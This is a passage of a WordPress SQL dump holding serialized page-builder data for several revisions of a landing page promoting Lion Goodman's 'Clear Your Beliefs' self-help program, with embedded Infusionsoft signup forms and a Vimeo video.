(1192, 1674, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:225:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -108px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:646:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -8px; margin-bottom: -27px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook.</p>\n<center style="margin-top: -5px;">\n<div style="margin-left: -15px; margin-bottom: -18px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:946:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 12px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 50px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 16px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -18px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -18px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:841:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png"></div>\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<p style="text-align: center; margin-top: 15px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, &#038;\nLimit Your True Magnificence</center>\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1193, 1675, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:225:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -108px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:646:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -8px; margin-bottom: -27px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; margin-top:30px; margin-bottom:0px;">Download the free eBook.</p>\n<center style="margin-top: -5px;">\n<div style="margin-left: -15px; margin-bottom: -12px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:946:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 12px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 50px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 14px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -10px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -10px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:841:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png"></div>\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<p style="text-align: center; margin-top: 15px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, &#038;\nLimit Your True Magnificence</center>\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1194, 1676, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:225:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -108px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:646:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -8px; margin-bottom: -27px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; margin-top:30px; margin-bottom:0px;">Download the free eBook.</p>\n<center style="margin-top: -5px;">\n<div style="margin-left: -15px; margin-bottom: -12px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:944:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 12px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 50px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 14px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: 10px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: 10px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:841:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png"></div>\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<p style="text-align: center; margin-top: 15px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, &#038;\nLimit Your True Magnificence</center>\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner 